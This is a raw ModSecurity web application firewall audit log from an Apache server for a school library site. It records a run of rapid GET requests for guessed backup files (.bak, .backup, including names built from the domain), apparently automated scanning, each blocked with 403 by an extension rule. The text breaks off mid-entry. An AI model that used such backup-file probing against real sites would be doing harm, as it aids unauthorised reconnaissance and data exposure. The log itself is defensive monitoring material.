Stopwatch2: 1747543883083807 1818; combined=663, p1=335, p2=302, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d14339-Z-- --b22c7e73-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS4gAAAI8 103.236.140.4 56816 103.236.140.4 8181 --b22c7e73-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0.1) Gecko/20100101 Firefox/67.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093331 --b22c7e73-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b22c7e73-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883084294 1637 (- - -) Stopwatch2: 1747543883084294 1637; combined=658, p1=324, p2=308, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b22c7e73-Z-- --b90d1d56-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS4wAAAII 103.236.140.4 56816 103.236.140.4 8181 --b90d1d56-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151945250 --b90d1d56-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b90d1d56-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883095182 2421 (- - -) Stopwatch2: 1747543883095182 2421; combined=872, p1=432, p2=412, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b90d1d56-Z-- --befcef7e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS5AAAAJc 103.236.140.4 56816 103.236.140.4 8181 --befcef7e-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190618 --befcef7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --befcef7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883099110 1832 (- - -) Stopwatch2: 1747543883099110 1832; combined=778, p1=339, p2=412, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --befcef7e-Z-- --f9ecef42-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS5QAAAIA 103.236.140.4 56816 103.236.140.4 8181 --f9ecef42-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190625 --f9ecef42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f9ecef42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883106086 1619 (- - -) Stopwatch2: 1747543883106086 1619; combined=674, p1=334, p2=314, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9ecef42-Z-- --7f77c665-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8wgAAAA4 103.236.140.4 56796 103.236.140.4 8181 --7f77c665-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093347 --7f77c665-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f77c665-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883111238 1680 (- - -) Stopwatch2: 1747543883111238 1680; combined=706, p1=343, p2=335, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f77c665-Z-- --5e1c9770-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xAAAABI 103.236.140.4 56796 103.236.140.4 8181 --5e1c9770-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093360 --5e1c9770-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5e1c9770-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883126106 1851 (- - -) Stopwatch2: 1747543883126106 1851; combined=718, p1=364, p2=328, p3=0, p4=0, p5=26, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c9770-Z-- --8b49587d-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6QAAAIU 103.236.140.4 56816 103.236.140.4 8181 --8b49587d-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190636 --8b49587d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b49587d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883147197 1672 (- - -) Stopwatch2: 1747543883147197 1672; combined=694, p1=341, p2=327, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b49587d-Z-- --91405064-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6gAAAIg 103.236.140.4 56816 103.236.140.4 8181 --91405064-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175796 --91405064-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91405064-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883162171 1726 (- - -) Stopwatch2: 1747543883162171 1726; combined=722, p1=361, p2=332, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91405064-Z-- --82ce0850-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xQAAAAw 103.236.140.4 56796 103.236.140.4 8181 --82ce0850-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 OPR/54.0.2952.71 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090963 --82ce0850-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82ce0850-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883162449 1607 (- - -) Stopwatch2: 1747543883162449 1607; combined=646, p1=321, p2=297, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82ce0850-Z-- --9ee5934e-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0AAAAEE 103.236.140.4 56832 103.236.140.4 8181 --9ee5934e-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436710 --9ee5934e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9ee5934e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883163241 2110 (- - -) Stopwatch2: 1747543883163241 2110; combined=787, p1=369, p2=389, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ee5934e-Z-- --3fe4890a-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0gAAAFc 103.236.140.4 56832 103.236.140.4 8181 --3fe4890a-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190657 --3fe4890a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3fe4890a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883171530 1971 (- - -) Stopwatch2: 1747543883171530 1971; combined=787, p1=424, p2=335, p3=0, p4=0, p5=28, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe4890a-Z-- --498cb605-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E0wAAAEI 103.236.140.4 56832 103.236.140.4 8181 --498cb605-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436721 --498cb605-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --498cb605-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883177390 1746 (- - -) Stopwatch2: 1747543883177390 1746; combined=701, p1=327, p2=347, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498cb605-Z-- --a1f8f52d-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E1QAAAFM 103.236.140.4 56832 103.236.140.4 8181 --a1f8f52d-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190670 --a1f8f52d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1f8f52d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883183828 2002 (- - -) Stopwatch2: 1747543883183828 2002; combined=805, p1=377, p2=392, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f8f52d-Z-- --48884007-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xwAAAAE 103.236.140.4 56796 103.236.140.4 8181 --48884007-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190675 --48884007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48884007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883187977 2001 (- - -) Stopwatch2: 1747543883187977 2001; combined=811, p1=306, p2=468, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48884007-Z-- --e89fdd6e-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8yAAAABA 103.236.140.4 56796 103.236.140.4 8181 --e89fdd6e-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609740 --e89fdd6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e89fdd6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883197817 1792 (- - -) Stopwatch2: 1747543883197817 1792; combined=706, p1=377, p2=301, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e89fdd6e-Z-- --1a876f7f-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6wAAAIo 103.236.140.4 56816 103.236.140.4 8181 --1a876f7f-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436745 --1a876f7f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a876f7f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883198148 2094 (- - -) Stopwatch2: 1747543883198148 2094; combined=737, p1=394, p2=315, p3=0, p4=0, p5=27, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a876f7f-Z-- --f15cd93a-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8yQAAABc 103.236.140.4 56796 103.236.140.4 8181 --f15cd93a-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like 